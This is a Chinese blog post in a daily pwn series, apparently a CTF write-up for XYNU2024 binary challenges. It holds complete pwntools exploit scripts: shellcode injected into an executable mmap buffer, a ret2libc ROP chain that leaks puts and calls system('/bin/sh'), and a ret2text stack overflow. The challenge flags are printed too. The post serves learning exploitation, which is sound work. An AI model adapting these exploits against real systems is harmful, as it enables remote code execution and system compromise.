每日一Pwn 2025/1/10
G3rling
|
|
每日一Pwn
|
21
|
0
|

XYNU2024信安杯

NC

nc连上就有

image-20250110170347919

XYNUCTF{435fa9df-4c7e-4b21-b508-3c4faa7e76c9}

Shellcode

检查保护

image-20250110171147020

查看主函数发现存在mmap函数,此处的mmap将buf段0x400大小的内存区权限改为可读可写可执行

image-20250110172544563

可以通过read函数向buf读入shellcode后执行。

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='gz.imxbt.cn'
port=20706
file_name='shellcode'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    shellcode = asm(shellcraft.sh())
    payload=shellcode.ljust((0x10),b'a')

    io.sendlineafter(b'different!',payload)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

# XYNUCTF{7aca466e-dd1c-4890-82d9-a016d41d35c1}

ret2libc

检查保护情况,64位只开了代码执行保护

image-20250110175416598

在XYNU函数内发现read栈溢出,无后门函数,考虑ret2libc

image-20250110175806623

查找所需寄存器地址

image-20250110183543371

编写代码

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='gz.imxbt.cn'
port=20709
file_name='pwn'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    ret_add = 0x000000000040101a
    pop_rdi = 0x0000000000401209
    main_add = 0x000000000040123C
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']

    print("Puts_got: ",hex(puts_got))
    print("Puts_plt: ",hex(puts_plt))

    offset=0x70

    payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
    io.sendlineafter(b'ezret2libc', payload1)
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    print("Puts_addr: ",hex(puts_addr))

    libc_base = puts_addr - libc.symbols['puts']
    system_add = libc_base + libc.symbols['system']
    bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

    payload2 = b'a' * (offset+8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)

    io.sendlineafter(b'ezret2libc', payload2)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

# XYNUCTF{dfecb249-67ec-42f5-bec0-a416044085c4}

ret2text

检查保护,64位只开了代码执行保护

image-20250110214058783

检查程序,存在后门函数。主函数处gets存在栈溢出,编写代码

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='gz.imxbt.cn'
port=20728
file_name='pwn'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    binsh_add = 0x0000000000401208

    payload = b'a'*(0x8+8) + p64(binsh_add)
    io.sendlineafter(b"overflow?",payload)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

# XYNUCTF{385959a1-b1ac-41e3-b840-294a11d2bb7c}
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
会pwn是什么感觉.jpg

							
							

							
苦酒入喉心作痛.jpg

							
							

							
每日一Pwn 2025/1/14

							
							

							
每日一Pwn 2024/12/11

							
							

							
每日一Pwn 2024/12/10

							
							

							
每日一Pwn 2024/12/9

							
							

							
每日一Pwn 2024/12/6

							
							

							
每日一Pwn 2024/12/5